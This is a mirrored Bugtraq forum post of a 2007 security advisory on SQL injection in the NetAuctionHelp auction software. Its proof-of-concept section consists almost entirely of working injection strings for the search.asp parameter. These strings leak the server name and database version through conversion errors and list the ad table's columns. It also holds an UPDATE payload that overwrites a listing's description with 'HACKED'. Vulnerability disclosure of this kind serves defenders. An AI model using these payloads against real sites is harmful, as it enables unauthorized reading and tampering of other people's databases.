Aria-Security.net: NetAuctionHelp SQL Injection

看板Bugtraq作者時間18年前 (2007/11/23 00:09), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串1/4 (看更多)
Aria-Security Net Original Advisory @ http://aria-security.net/forum/showthread.php?p=1099 ------------------------ Vendor: http://www.netauctionhelp.com PoC: search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=[SQL INJECTION] search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch='having 1=1-- search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1' or 1=convert(int,@@servername)-- search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1' or 1=convert(int,@@version)-- tblAd.id tblAd.aspectratio tblAd.title tblAd.imagepath tblAd.startdate tblAd.enddate tblAd.id_seller tblAd.descr -1' UPDATE tblAd set descr= 'HACKED' Where(ID= '1');-- this code with update itemdetl.asp?id=1 Credit goes to Aria-Security.Net Greetz: AurA
文章代碼(AID): #17HQdK00 (Bugtraq)
文章代碼(AID): #17HQdK00 (Bugtraq)